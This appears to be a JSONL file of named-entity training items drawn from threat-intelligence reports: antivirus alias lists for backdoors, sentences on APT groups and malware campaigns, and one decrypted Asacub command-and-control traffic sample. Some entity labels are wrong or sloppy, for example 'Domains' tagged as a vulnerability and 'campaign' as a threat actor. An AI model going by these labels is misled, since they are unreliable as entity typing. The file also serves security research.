{"text": "A backdoor also known as: Trojan-PSW.Win32.QQPass!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Spyware.59892-2 Trojan-PSW.Win32.QQPass.sso Trojan.Win32.QQPass.bcshgi Trojan.Win32.Downloader.75264.M TrojWare.Win32.PSW.QQPass.~Sso Backdoor.PePatch.Win32.16970 Trojan[PSW]/Win32.QQPass Troj.PSW32.W.QQPass.toI3 Trojan-PSW.Win32.QQPass.sso PWS:Win32/Stealer.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006537", "source": "cyner2_train"}}
{"text": "ESET detects the games that install the Trojan as Android/TrojanDropper.Mapin and the Trojan itself as Android/Mapin.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "SYSTEM: games": [[17, 22]], "MALWARE: Trojan": [[40, 46], [86, 92]]}, "info": {"id": "cyner2_train_006542", "source": "cyner2_train"}}
{"text": "Malware Seen In The Middle East Region Domains used by APT28.", "spans": {"MALWARE: Malware": [[0, 7]], "VULNERABILITY: Domains": [[39, 46]], "THREAT_ACTOR: APT28.": [[55, 61]]}, "info": {"id": "cyner2_train_006543", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Downloader-39183 Trojan.Win32.Dwn.whgnl Trojan.Win32.A.Downloader.28672.AMZ Trojan.DownLoader6.15686 BehavesLike.Win32.BadFile.mm Trojan[Downloader]/Win32.Tobor Trojan.Graftor.D45EB TrojanDownloader:Win32/Tobor.A TrojanDownloader.Tobor Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006544", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.Elzob.D2B30 BehavesLike.Win32.BadFile.qm HackTool:Win32/WMIShell.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006548", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sefnit.Win32.13226 Trojan.Win32.Sefnit.ekkxqe Trojan.DownLoader23.50639 Trojan.Sefnit.pj Trojan/Win32.Sefnit TrojanDownloader:Win32/Trulop.A Trj/GdSda.A Win32/RA-based.NFG Trojan.Sefnit!apDWbcANJlc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006549", "source": "cyner2_train"}}
{"text": "BankBot is a family of Trojan malware targeting Android devices that surfaced in the second half of 2016.", "spans": {"MALWARE: BankBot": [[0, 7]], "MALWARE: family of Trojan malware": [[13, 37]], "SYSTEM: Android devices": [[48, 63]]}, "info": {"id": "cyner2_train_006550", "source": "cyner2_train"}}
{"text": "Let ’ s compare examples of traffic from Smaps and Asacub — an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { “ id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” type ” : ” get ” , ” info ” : ” imei:365548770159066 , country : PL , cell : Tele2 , android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2″ } Data sent to the server [ { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” \\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416 1000 50″ , ” timestamp ” : ” 1452272572″ } } , { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” BALANCE ” , ” timestamp ” : ” 1452272573″ } } ] Instructions received from the server A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS ( encoded with the base64 algorithm ) from the device to the C & C server : Smaps format Asacub format Decrypted data from Asacub traffic : { “ data ” : ” 2015:10:14_02:41:15″ , ” id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” text ” : ” SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= ” , ” number ” : ” 1790″ , ” type ” : ” load ” } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS .", "spans": {"MALWARE: Smaps": [[41, 46], [209, 214]], "MALWARE: Asacub": [[51, 57], [223, 229], [258, 264]]}, "info": {"id": "cyner2_train_006551", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9972 Infostealer.Tarno.B TrojWare.Win32.GhostDEL.~A Trojan.MulDrop4.8101 BehavesLike.Win32.Virut.qc Backdoor/Huigezi.2007.aqzf TrojanDownloader:Win32/Ksare.A Trj/CI.A Win32/Trojan.66a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006554", "source": "cyner2_train"}}
{"text": "Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke.", "spans": {"THREAT_ACTOR: Duke group's": [[62, 74]], "MALWARE: SeaDuke": [[84, 91]], "MALWARE: CloudDuke.": [[96, 106]]}, "info": {"id": "cyner2_train_006555", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D20DA2 TrojWare.Win32.TrojanDownloader.Delf.SAD BehavesLike.Win32.Dropper.dc TR/Dldr.Vifuls.pwiho TrojanDownloader:Win32/Vifuls.A TScope.Trojan.Delf Win32.Trojan.Badur.Eddg Win32/Trojan.fd8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006556", "source": "cyner2_train"}}
{"text": "Several bots relied heavily, if not exclusively, on systems with weak and/or default passwords to spread.", "spans": {"MALWARE: bots": [[8, 12]], "SYSTEM: systems": [[52, 59]]}, "info": {"id": "cyner2_train_006557", "source": "cyner2_train"}}
{"text": "In other words, the attack targeted organizations that design, build and support industrial solutions for critical infrastructure.", "spans": {"ORGANIZATION: organizations": [[36, 49]], "ORGANIZATION: industrial solutions": [[81, 101]], "SYSTEM: critical infrastructure.": [[106, 130]]}, "info": {"id": "cyner2_train_006559", "source": "cyner2_train"}}
{"text": "While revisiting a Flokibot campaign that was targeting point of sale PoS systems in Brazil earlier this year, we discovered something interesting.", "spans": {"MALWARE: Flokibot": [[19, 27]], "THREAT_ACTOR: campaign": [[28, 36]], "SYSTEM: PoS systems": [[70, 81]]}, "info": {"id": "cyner2_train_006560", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Finfish.11008 Backdoor.Win32.Finfish!O Backdoor.Finfish.r6 Backdoor.Finfish.Win32.1 Backdoor.W32.Finfish.b!c Backdoor/Finfish.b Backdoor.Finfish!WTL5ZVLbFgg Backdoor.Finfish Win32/Belesak.D TROJ_FINSPY.A Backdoor.Win32.Finfish.b Trojan.Win32.Finfish.wbhuj Trojan.Win32.Z.Finfish.11008[h] Backdoor.Win32.Finfish.B Trojan:W32/FinSpy.B Trojan.NtRootKit.14434 TROJ_FINSPY.A W32/Backdoor.CLPB-2084 Backdoor/Finfish.a W32/Belesak.D Trojan:WinNT/Spinfy.A Backdoor.Finfish Backdoor.Win32.Finfish.b Win32.Backdoor.Finfish.Iso Backdoor.Win32.Finfish", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006561", "source": "cyner2_train"}}
{"text": "But an investigation now suggests the attack was in fact carried out by a group of Russian hackers.", "spans": {"ORGANIZATION: group": [[74, 79]], "THREAT_ACTOR: Russian hackers.": [[83, 99]]}, "info": {"id": "cyner2_train_006562", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.Luder!O Worm.Polkayam.A3 Worm.Luder Trojan/Spy.VB.nub TROJ_SPNR.15GB13 Backdoor.Trojan Win32/Tnega.VHcOIY TROJ_SPNR.15GB13 Win.Trojan.Luder-83 Trojan.Win32.Luder.crcdfm W32.W.WBNA.lJLh Worm.Luder.Win32.197 Worm/Luder.chm TR/Dynamer.dtc.9853 Worm/Win32.Luder Worm:Win32/Polkayam.A Worm/Win32.Luder.C169426 Worm.Luder Worm.Luder!PF0ilQ/gy98 Worm.Win32.Luder W32/Luder.BQPT!tr Win32/Trojan.cfc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006564", "source": "cyner2_train"}}
{"text": "In this post we will show links to a recently publicized PoS malware campaign, and describe possible threat motivations behind this or other POS vendor exploitation campaign.", "spans": {"MALWARE: PoS malware": [[57, 68]], "THREAT_ACTOR: campaign,": [[69, 78]], "VULNERABILITY: POS vendor exploitation": [[141, 164]], "THREAT_ACTOR: campaign.": [[165, 174]]}, "info": {"id": "cyner2_train_006567", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.TUD Trojan/W32.Hesv.372736.B Worm.Folxrun Win32.Worm.TUD Win32.Worm.TUD Win32.Trojan.VB.ja W32.Rasith Win32/Rasith.A TROJ_FSYSNA_FB120272.UVPM Win32.Worm.TUD Trojan.Win32.Hesv.bjrj Win32.Worm.TUD Trojan.Win32.Autoruner2.ewcqfg Troj.W32.Hesv!c Win32.Worm.TUD Win32.Worm.TUD Win32.HLLW.Autoruner2.29691 Trojan.Fsysna.Win32.4334 BehavesLike.Win32.Vesenlosow.fm Worm.Win32.Rasith W32/Trojan.SHGP-6241 Trojan/Fsysna.atg Trojan/Win32.Fsysna Worm:Win32/Folxrun.A Trojan/Win32.Injector.R167793 Trojan.Win32.Hesv.bjrj Trojan.Fsysna Trj/CI.A Win32.Trojan.Hesv.Lkdf Trojan.Fsysna! Win32/Worm.4c0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006569", "source": "cyner2_train"}}
{"text": "Novetta has collected and shares within this report evidence that suggests multiple actors,", "spans": {"ORGANIZATION: Novetta": [[0, 7]]}, "info": {"id": "cyner2_train_006570", "source": "cyner2_train"}}
{"text": "This botnet is responsible for the majority of Locky and Dridex activity.", "spans": {"MALWARE: botnet": [[5, 11]], "MALWARE: Locky": [[47, 52]], "MALWARE: Dridex": [[57, 63]]}, "info": {"id": "cyner2_train_006571", "source": "cyner2_train"}}
{"text": "The tool has been used in global phishing attacks and its use has been implicated in a number of notable attacks.", "spans": {"MALWARE: tool": [[4, 8]]}, "info": {"id": "cyner2_train_006574", "source": "cyner2_train"}}
{"text": "In this case I spent more time analyzing the campaign than I initially planned.", "spans": {}, "info": {"id": "cyner2_train_006575", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.9E06 Win32.Trojan.WisdomEyes.16070401.9500.9767 Spyware.Perfect Win32/Gamepass.QHH Trojan-Dropper.Win32.Dorgam.xfl Win32.TenThief.QQPsw_def.fvg Trojan.PWS.Wsgame.36114 BehavesLike.Win32.Ransomware.dc Trojan.Win32.QQpass TrojanSpy.FlyStudio.cx TR/QQpass.E.4 Trojan-Dropper.Win32.Dorgam.xfl Win32/PSW.QQPass.OHY Win32/Trojan.884", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006576", "source": "cyner2_train"}}
{"text": "The malware waits for victims to open the Google Play store and then displays a fake html overlay page asking for credit card information.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: Google Play store": [[42, 59]]}, "info": {"id": "cyner2_train_006577", "source": "cyner2_train"}}
{"text": "On July 14, FireEye researchers discovered attacks exploiting the Adobe Flash vulnerability CVE-2015-5122, just four days after Adobe released a patch.", "spans": {"ORGANIZATION: FireEye researchers": [[12, 31]], "VULNERABILITY: exploiting": [[51, 61]], "SYSTEM: Adobe Flash": [[66, 77]], "VULNERABILITY: vulnerability": [[78, 91]], "ORGANIZATION: Adobe": [[128, 133]]}, "info": {"id": "cyner2_train_006578", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.S239831 Trojan.RA.Win32.52 Trojan.Win32.Reconyc.ejtcsm BehavesLike.Win32.Dropper.vc TR/RemoteAdmin.romkw Trojan/Win32.Scar Trojan.Zusy.D258ED Trojan.Banload Trojan.Win32.ChePro", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006580", "source": "cyner2_train"}}
{"text": "The source code appears to have been picked by one or more threat actors and was used to conduct DDoS attacks against Georgia in 2008.", "spans": {"THREAT_ACTOR: threat actors": [[59, 72]]}, "info": {"id": "cyner2_train_006581", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanAPT.Moudoor.A8 TROJ_BANLOAD.GDV Backdoor.Moudoor TROJ_BANLOAD.GDV Win.Trojan.Downloader-27596 Trojan.DownLoader6.13038 Trojan-Downloader.Win32.Banload W32/Trojan.MQRX-7833 W32.Malware.Heur Trojan[Downloader]/Win32.Unknown Win32.Troj.Undef.kcloud Trojan.Downloader.cmGfaSmx9Rpb TrojanDownloader:Win32/Moudoor.A Win-Trojan/Downloader.46592.GU Trojan.Downloader.46592 Win32/TrojanDownloader.Moudoor.A W32/Downloader_a.BWT!tr Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006582", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.OnlineGames.KDPO TrojanPWS.Dozmot.D4 Infostealer.Gampass W32/Magania.GZ TROJ_GAMEHTI.SMI Trojan.Spy-73883 Trojan-GameThief.Win32.OnLineGames.bnkb Trojan.PWS.OnlineGames.KDPO Trojan.PWS.Magania!Tq/DAk7oVGo Virus.Win32.Part.a TrojWare.Win32.PSW.OnlineGames.~BNKB Trojan-PSW:W32/OnlineGames.UBO Trojan.PWS.Gamania.30052 TROJ_GAMEHTI.SMI Trojan-GameThief.Win32.WOW!IK Trojan/PSW.OnLineGames.bton Win32.PSWTroj.OnLineGames.kcloud PWS:Win32/Dozmot.D Trojan.Win32.PSWIGames.27176.E Trojan.PWS.OnlineGames.KDPO Trojan/Win32.OnlineGameHack BScope.Trojan.OnlineGames.0825 Trojan-PSW.Gampass Win32/PSW.WOW.NQS Trojan.Win32.FakeKsUsr.a Trojan-GameThief.Win32.WOW W32/Onlinegames.OST!tr.pws Trj/Lineage.LNC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006583", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Bedep Trojan.Zusy.D3CF93 Backdoor.Win32.Bedep.lls Win32.Backdoor.Bedep.Lnob BDS/Bedep.ghjmg Trojan[Backdoor]/Win32.Bedep Backdoor.Win32.Bedep.lls Win-Trojan/Bmdoor.100864 Backdoor.Win32.Bedep", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006586", "source": "cyner2_train"}}
{"text": "Tofsee is a multi-purpose malware with wide array of capabilities – it can mine bitcoins, send emails, steal credentials, perform DDoS attacks, and more.", "spans": {"MALWARE: Tofsee": [[0, 6]], "MALWARE: multi-purpose malware": [[12, 33]]}, "info": {"id": "cyner2_train_006587", "source": "cyner2_train"}}
{"text": "These are detected within Alienvault USM by looking for Excel launching Cmd.exe.", "spans": {"ORGANIZATION: Alienvault USM": [[26, 40]]}, "info": {"id": "cyner2_train_006588", "source": "cyner2_train"}}
{"text": "In that research we discussed two new malware families we named KASPERAGENT and MICROPSIA.", "spans": {"MALWARE: malware families": [[38, 54]], "MALWARE: KASPERAGENT": [[64, 75]], "MALWARE: MICROPSIA.": [[80, 90]]}, "info": {"id": "cyner2_train_006591", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.FakeAV Trojan.FakeSysDef.Win32.707 Trojan/Kryptik.ahre Win32.Trojan.WisdomEyes.16070401.9500.9999 TrojWare.Win32.Spy.Zbot.HEUB Trojan.DownLoader5.64514 BehavesLike.Win32.Downloader.dc Trojan/SmartFixer.gv W32.Trojan.Fakesysdef TR/FakeSysdef.aqwrb Trojan.Zbot.76 Trojan/Win32.FakeAV.R28472 FakeAlert-SysDef.ae TrojanFakeAV.FakeSysDef Trojan.Zbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006592", "source": "cyner2_train"}}
{"text": "Taiwan has been a regular target of cyber espionage threat actors for a number of years.", "spans": {"THREAT_ACTOR: cyber espionage threat actors": [[36, 65]]}, "info": {"id": "cyner2_train_006593", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Nekozillot Win32.Trojan.WisdomEyes.16070401.9500.9656 Trojan.DownLoader25.61646 W32/Trojan.RZHM-5084 BDS/RedCap.gyswy Trojan.MSILPerseus.D21311 Backdoor:MSIL/Nekozillot.A!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006596", "source": "cyner2_train"}}
{"text": "It seems to be that the actors behind these campaigns are back now and launching again massive spam attacks.", "spans": {"THREAT_ACTOR: actors": [[24, 30]], "THREAT_ACTOR: campaigns": [[44, 53]]}, "info": {"id": "cyner2_train_006599", "source": "cyner2_train"}}
{"text": "and launch the new activity as the payload.", "spans": {"MALWARE: payload.": [[35, 43]]}, "info": {"id": "cyner2_train_006601", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Quby.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006602", "source": "cyner2_train"}}
{"text": "So far, these campaigns have targeted countries including Germany, Austria, and the United Kingdom.", "spans": {"THREAT_ACTOR: campaigns": [[14, 23]]}, "info": {"id": "cyner2_train_006604", "source": "cyner2_train"}}
{"text": "This includes,among others, Poland, Australia, United Kingdom and Spain.", "spans": {}, "info": {"id": "cyner2_train_006605", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Roron.F Worm.Roron.Win32.28 WORM_OROR.Q Win32.Trojan.WisdomEyes.16070401.9500.9941 W32/Roro.AA@mm W32.HLLW.Oror.C@mm Win32/Oror.U WORM_OROR.Q Win.Trojan.Oror-3 Trojan.Win32.IRCBot.dvpnyt W32.W.Envid.l6rk Win32.Backdoor.Ircbot.Lned Worm.Win32.Roron.51 Win32.HLLM.RoRo BehavesLike.Win32.Backdoor.cc W32/Roro.AA@mm Backdoor/IRCBot.rdt WORM/Roron.51 Worm[Email]/Win32.Roron Win32.Hack.IRCBot.g.kcloud I-Worm.Win32.Roron.82954 Worm:Win32/Roron.Z@mm Win32/Roron.worm.81925 Worm.Roron Win32/Roron.51 IRC.Roron.G Email-Worm.Win32.Roron W32/Roron.B!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006606", "source": "cyner2_train"}}
{"text": "The Kaspersky Anti-Ransom team decrypted the Xpan Trojan, allowing them to rescue the files of a Hospital in Brazil that had fallen victim to this Ransomware family.", "spans": {"ORGANIZATION: The Kaspersky Anti-Ransom team": [[0, 30]], "MALWARE: Xpan Trojan,": [[45, 57]], "ORGANIZATION: Hospital": [[97, 105]], "MALWARE: Ransomware family.": [[147, 165]]}, "info": {"id": "cyner2_train_006607", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DL.BHO.UDE W32/DLoader.AIYY Trojan.Downloader-70412 TrojWare.Win32.Bho.yme Trojan.Win32.Bho.yme Trojan.MulDrop.origin Heuristic.BehavesLike.Win32.Dropper.K TrojanDropper.Softfy.cn Trojan:Win32/Gedanjo.A Trojan-Downloader.Win32.BHO.lff Trojan.Clicker.Win32.Undef.mi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006608", "source": "cyner2_train"}}
{"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day CVE-2015-2590 in July 2015.", "spans": {"MALWARE: JHUHUGIT implant": [[4, 20]], "VULNERABILITY: Java zero-day": [[110, 123]]}, "info": {"id": "cyner2_train_006609", "source": "cyner2_train"}}
{"text": "These spam campaigns feature a multi-stage infection chain including a PDF file, a malicious Microsoft Office document, and finally, the Jaff ransomware loader.", "spans": {"THREAT_ACTOR: spam campaigns": [[6, 20]], "MALWARE: the Jaff ransomware loader.": [[133, 160]]}, "info": {"id": "cyner2_train_006610", "source": "cyner2_train"}}
{"text": "Indicators of the malware used in two bank heist against Tienphong Commercial Bank in Vietnam and the Bangladesh central bank.", "spans": {"MALWARE: malware": [[18, 25]], "ORGANIZATION: Tienphong Commercial Bank": [[57, 82]], "ORGANIZATION: the Bangladesh central bank.": [[98, 126]]}, "info": {"id": "cyner2_train_006611", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RiskWare.Tool.CK Win32.Trojan.WisdomEyes.16070401.9500.9947 Trojan.Win32.Clicker.8989 TrojWare.Win32.Patched.KSU Trojan.DownLoader.5848 BehavesLike.Win32.Ramnit.xc TR/Dldr.Hup.UH.15.B Win32.Troj.download.kcloud Trojan.Dropper/Packed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006614", "source": "cyner2_train"}}
{"text": "The delivery document also saved the post-exploitation credential harvesting tool known as Mimikatz, which we believe the threat actors will use to gather account credentials from the compromised system.", "spans": {"MALWARE: the post-exploitation credential harvesting tool": [[33, 81]], "MALWARE: Mimikatz,": [[91, 100]], "THREAT_ACTOR: the threat actors": [[118, 135]], "SYSTEM: the compromised system.": [[180, 203]]}, "info": {"id": "cyner2_train_006615", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Standardtest.17104 Win32.Trojan.WisdomEyes.16070401.9500.9983 Win32/Tnega.FJZCPHC Win.Trojan.Standardtest-1 Trojan.Win32.StandardTest.cthmar Win32.Trojan.Standardtest.Dvpy TrojWare.Win32.StandardTest.A Trojan.Win32.StandardTest TR/StandardTest.0 Trojan.Razy.D1D493 Trojan:Win32/StandardTest.0 Trojan/Win32.Kazy.C224799 Trojan.Kazy!M40EV8PiuTc Win32/Trojan.b42", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006616", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MalPack Ransom_Blocker.R011C0RB618 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.FakeAV Win.Trojan.Emotet-6441079-0 Trojan-Ransom.Win32.Blocker.krar Trojan.Win32.Encoder.exomzo Trojan.Win32.Z.Zusy.183296.BS TrojWare.Win32.Ransom.GandCrypt.A Trojan.Encoder.24475 BehavesLike.Win32.PWSZbot.cc Trojan.Win32.Crypt Trojan.Blocker.ier TR/Crypt.ZPACK.hwjhn Trojan.Zusy.D42FEC Trojan-Ransom.Win32.Blocker.krar TrojanProxy:Win32/Bunitu.Q!bit Trojan/Win32.Magniber.R219494 W32/Injector.DVHR!tr Win32/Trojan.ff4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006617", "source": "cyner2_train"}}
{"text": "The FireEye as a Service team detected independent phishing campaigns conducted by two Chinese advanced persistent threat APT groups that we track, APT3 and APT18.", "spans": {"ORGANIZATION: FireEye": [[4, 11]], "ORGANIZATION: Service team": [[17, 29]], "THREAT_ACTOR: phishing campaigns": [[51, 69]], "THREAT_ACTOR: Chinese advanced persistent threat APT groups": [[87, 132]], "THREAT_ACTOR: APT3": [[148, 152]], "THREAT_ACTOR: APT18.": [[157, 163]]}, "info": {"id": "cyner2_train_006618", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.HllpHQc.Trojan Win32.HLLP.DeTroie.A HLLP.DeTroie Win32.HLLP.DeTroie.A Virus.DeTroie.Win32.8 W32/HLLP.DeTroie.a Win32.HLLP.DeTroie.A Win32.Worm.DeTroie.b W32/HLLP.Detroie.A W32.HLLP.DeTroie Win32/DeTroie.D WORM_DETROIE.A Win.Trojan.DeTroie-1 Virus.Win32.HLLP.DeTroie Win32.HLLP.DeTroie.A Virus.Win32.DeTroie.bbxbrd W32.HLLP.DeTroie.tnqA Virus.Win32.Hllp.aad Win32.HLLP.DeTroie.A Virus.Win32.HLLP.DeTroie.E Win32.HLLP.Cheval WORM_DETROIE.A BehavesLike.Win32.Cheval.tz W32/HLLP.Detroie.A Win32/HLLP.DeTroie W32.Hllp.Detroie Virus/Win32.HLLP.DeTroie Worm:Win32/Cheval.D Win32.Detroie.A Virus.Win32.HLLP.DeTroie Win32.HLLP.DeTroie.A Win32/HLLP.Detroie.D W32/Cheval.dr Virus.Win32.HLLP.DeTroie Win32/HLLP.DeTroie Win32.HLLP.DeTroie.C Virus.Win32.HLLP.DeTroie W95/HLLP.Detroie.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006621", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.E0AE Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Yakes.vphb Trojan.Win32.Yakes.exslpy Trojan.Encoder.3976 BehavesLike.Win32.Downloader.kc Trojan.Win32.Crypt Trojan.Yakes.yvz TR/Crypt.ZPACK.rwser Trojan.Win32.Yakes.vphb Trojan:Win32/Godzilia.B!bit Trj/GdSda.A W32/Kryptik.EYKI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006623", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Spybot.Worm Win32.Stration Win32.HLLW.SpyBot Worm/Spyboter.44064 P2P-Worm.Win32.SpyBot.gl!IK P2P-Worm.Win32.SpyBot.eu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006625", "source": "cyner2_train"}}
{"text": "Visiting the main page hosted at www.president-office.gov[.]mm triggered the malicious content, as the threat actors injected an inline frame IFRAME into a JavaScript file used by Drupal for the site's theme.", "spans": {"MALWARE: malicious": [[77, 86]], "THREAT_ACTOR: threat actors": [[103, 116]], "ORGANIZATION: Drupal": [[180, 186]]}, "info": {"id": "cyner2_train_006627", "source": "cyner2_train"}}
{"text": "This campaign started in April 2017, using a spear phishing campaign to deliver the MICROPSIA payload in order to remotely control infected systems.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "THREAT_ACTOR: spear phishing campaign": [[45, 68]], "MALWARE: MICROPSIA payload": [[84, 101]], "SYSTEM: infected systems.": [[131, 148]]}, "info": {"id": "cyner2_train_006628", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OngameJFT.Trojan Application.Hacktool.CX Worm/W32.AutoRun.11656 RiskTool.Win32.Tcpz!O Risktool.Tcpz W32/AutoRun.ezt W32/Spybot.QYN Hacktool.Rootkit Win32/Tcpz.A Win.Trojan.B-285 Application.Hacktool.CX not-a-virus:RiskTool.Win32.Tcpz.a Application.Hacktool.CX Trojan.Win32.SdBot.hjuf Application.Hacktool.CX TrojWare.Win32.Trojan.TCPZ.~A Rootkit:W32/Tcpz.A Tool.TcpZ Backdoor.IRCBot.Win32.17564 Backdoor.Win32.IRCBot W32/Spybot.XPIF-6513 W32.Hack.Tool Application.Hacktool.CX Worm.AutoRun/Variant not-a-virus:RiskTool.Win32.Tcpz.a HackTool:WinNT/Tcpz.A Trojan/Win32.Rootkit.C53179 Rootkit.Win32.Drucker Hacktool/Tcpz.A HackTool.Tcpz!rBSvpdUKEZI W32/Tcpz.A!tr Win32/Worm.AutoRun.750", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006629", "source": "cyner2_train"}}
{"text": "This report records the analysis and tracing process of the entire incident.", "spans": {}, "info": {"id": "cyner2_train_006630", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeW7Folder.Fam.Trojan Trojan.Win32.Scar!O Trojan.Scar Troj.W32.Scar.toQM Win32.Trojan.VB.ac WORM_OTORUN.SM0 Trojan.Win32.Scar.lpco Trojan.Win32.Scar.crgjex TrojWare.Win32.WBNA.THR Trojan.MulDrop3.10901 WORM_OTORUN.SM0 BehavesLike.Win32.VBObfus.lt Worm.Win32.VB Worm/WBNA.hgwu Trojan/Win32.Scar Win32.Troj.Scar.fw.kcloud Trojan.Symmi.DFA6A Trojan.Win32.Scar.lpco Trojan:Win32/Tookibe.B!bit HEUR/Fakon.mwf TScope.Trojan.VB Trj/GdSda.A Win32/VB.OGG Win32.Trojan.Scar.Wqms W32/VB.QHS!tr Win32/Trojan.e82", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006631", "source": "cyner2_train"}}
{"text": "Casinos and resort hotels are the most recent victims of an attack that used RawPOS, an old POS malware, to steal customer data.", "spans": {"ORGANIZATION: Casinos": [[0, 7]], "ORGANIZATION: resort hotels": [[12, 25]], "MALWARE: RawPOS,": [[77, 84]], "MALWARE: POS malware,": [[92, 104]]}, "info": {"id": "cyner2_train_006633", "source": "cyner2_train"}}
{"text": "Since mid-July 2015, I've noticed an increase in malicious spam malspam caught by my employer's spam filters with java archive .jar file attachments.", "spans": {}, "info": {"id": "cyner2_train_006636", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Staget.bz W32/Trojan2.NIBK Trojan.Startpage W32/Staqet.B Win32.TRCrypt.Fkm Win.Trojan.Staget-7 Trojan.Win32.Staget.bz Trojan.Staget!Y7ZdgRV9k0Q TrojanBanker.Banker.tx TrojanDownloader:Win32/Kotibu.A Trojan/Win32.VB W32/Trojan2.NIBK Trojan.Staget.bz Trojan.Startpage!rem Win32/VB.PBM Trojan.Kotibu!447E Trojan.Win32.Staget W32/VB.ABBL!tr.dldr Trj/StartPage.DAW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006638", "source": "cyner2_train"}}
{"text": "In total, it appears this threat may have impacted users from 18 countries including China, France, Russia, Japan, United Kingdom, United States, Canada, Germany, Australia, Israel, Italy, Spain, Singapore, and South Korea.", "spans": {}, "info": {"id": "cyner2_train_006640", "source": "cyner2_train"}}
